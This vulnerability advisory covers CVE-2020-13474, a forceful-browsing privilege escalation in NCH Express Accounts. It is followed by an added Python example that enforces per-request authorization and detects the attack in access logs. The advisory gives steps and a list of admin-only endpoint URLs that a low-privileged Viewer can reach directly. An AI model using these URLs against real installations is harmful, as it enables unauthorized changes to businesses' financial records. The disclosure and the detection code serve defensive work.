Vulnerable Software: NCH Express Accounts
Vulnerability: Privilege Escalation
Affected Version: 8.24 and prior
Vendor Homepage: https://www.nchsoftware.com/
CVE: CVE-2020-13474
CVE Author: Tejas Nitin Pingulkar
Exploit Available: Yes
About Affected Software
Express Accounts is professional business accounting software, perfect for small businesses needing to document and report on incoming and outgoing cash flow, including sales, receipts, payments, and purchases.
Additional Information
NCH Express Accounts software allows you to access it over the web.
The web interface provides three types of user:
- Administrator
- User
- Viewer
The administrator user has access to all modules, including Create a new invoice, Create a new quote, Create new sales order, Create new purchase order, Apply customers payment, View Credit notes, Enter new accounts payable, view chart of Accounts, Make a Payment, Receive a payment, Add new item, Add new customer, Suppliers list, Add/Edit users.
Users with Viewer privileges do not have access to the above-mentioned functionality through the interface. By forceful browsing, however, the admin modules can be accessed with Viewer privileges, as shown next.
Exploit
I have created the users below for the PoC:
Admin user: admin@tejas.com
Viewer user: lowuser@tejas.com
As demonstrated in the video, “Chart of Accounts” has only one entry, and lowuser@tejas.com does not have access to the “Chart of Accounts” functionality (or any other module mentioned above); see the video at [2:14 min].
Log in as the low-privileged user and enter the URL below.
Click “Add New Account”.
Fill in all details and click OK.
Via forceful browsing, we were able to add an entry as the low-privileged user.
Similarly, via forceful browsing we can access the functions listed below:
Add New Invoice: http://[website:port]/invoiceprop?onok=invoicelist&oncancel=invoicelist
Add New Quote: http://[website:port]/quoteprop?onok=quotelist&oncancel=quotelist
Add New Sales Order: http://[website:port]/orderprop?onok=orderlist&oncancel=orderlist
Add New Purchase Order: http://[website:port]/porderprop?onok=porderlist&oncancel=porderlist
Payment: http://[website:port]/porderprop?onok=paymentlist&oncancel=paymentlist
Credit Notes: http://[website:port]/creditnotelistperiod
Account Payable: http://[website:port]/accpayable?onok=billlist&oncancel=billlist
Chart of Accounts: http://[website:port]/acclist (video POC)
Payments and Purchases: http://[website:port]/cashtxn?payment=1
Receipts and Deposits: http://[website:port]/cashtxn?payment=0
Add New Item: http://[website:port]/itemprop?onok=itemlist&oncancel=itemlist
Add New Customer: http://[website:port]/customerprop?onok=customerlist&oncancel=customerlist
Suppliers List: http://[website:port]/supplierlist
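The root cause described above is that the role check lives in the menu rather than in the request handler, so a Viewer who types an admin URL is served. The following added example (not NCH code, and not taken from the advisory) shows the two things a defender wants here: a per-request, path-based authorization decision that ignores query parameters such as onok=/oncancel=, and a detection routine that scans access-log lines for non-admin sessions that received a 2xx on one of the paths listed above. The role names and the paths come from the advisory; treating every listed path as administrator-only is an assumption (the page only states that the administrator has access to all of them), and the log format and log lines are constructed for the example.

```python
"""Route-level authorization plus access-log detection for forceful browsing.

Added illustration for the CVE-2020-13474 write-up; not vendor code.
Role names and paths are taken from the advisory, the log format and the
sample log lines are constructed, and "every listed path is admin-only" is
an assumption made for the example.
"""
import re
from urllib.parse import urlsplit

# The three roles the advisory lists for the web interface.
ROLES = ("administrator", "user", "viewer")

# Paths from the advisory's URL list. Assumption: all of them require the
# Administrator role (the page says the administrator has all modules).
ADMIN_ONLY_PATHS = {
    "/invoiceprop", "/quoteprop", "/orderprop", "/porderprop",
    "/creditnotelistperiod", "/accpayable", "/acclist", "/cashtxn",
    "/itemprop", "/customerprop", "/supplierlist",
}


def is_authorized(role: str, url: str) -> bool:
    """Server-side decision that must run on every request.

    Hiding a menu entry is not a control; this check is what the handler
    must consult. Only the path is used, so onok=/oncancel= and any other
    query parameter cannot influence the decision.
    """
    if role not in ROLES:
        return False  # unknown or unauthenticated role: deny by default
    path = urlsplit(url).path.rstrip("/") or "/"
    if path in ADMIN_ONLY_PATHS:
        return role == "administrator"
    return True  # all other paths are available to any authenticated role


# Constructed log format: "<user> <role> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")


def find_forceful_browsing(log_lines):
    """Return (user, path) pairs where a non-admin session reached an
    admin-only path and the server answered 2xx, i.e. the server-side
    check above was missing. Blocked attempts (4xx) are not reported."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the constructed format
        user, role, _method, url, status = m.groups()
        if status.startswith("2") and not is_authorized(role, url):
            hits.append((user, urlsplit(url).path))
    return hits


# Constructed sample log using the advisory's two example accounts.
SAMPLE_LOG = [
    "admin@tejas.com administrator GET /acclist 200",
    "lowuser@tejas.com viewer GET /acclist 200",
    "lowuser@tejas.com viewer POST /invoiceprop?onok=invoicelist&oncancel=invoicelist 200",
    "lowuser@tejas.com viewer GET /acclist 403",
    "lowuser@tejas.com viewer GET /home 200",
    "not a log line",
]

if __name__ == "__main__":
    for user, path in find_forceful_browsing(SAMPLE_LOG):
        print(f"non-admin {user} was served admin-only path {path}")
```

Run stand-alone, the script reports the two Viewer requests to /acclist and /invoiceprop that were answered with 200, and stays silent for the 403 and the non-admin-only path. The design point is that `is_authorized` is the same function the request handler should call and the detector reuses; a single policy table keeps the enforcement and the monitoring from drifting apart.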
Proof Of Concept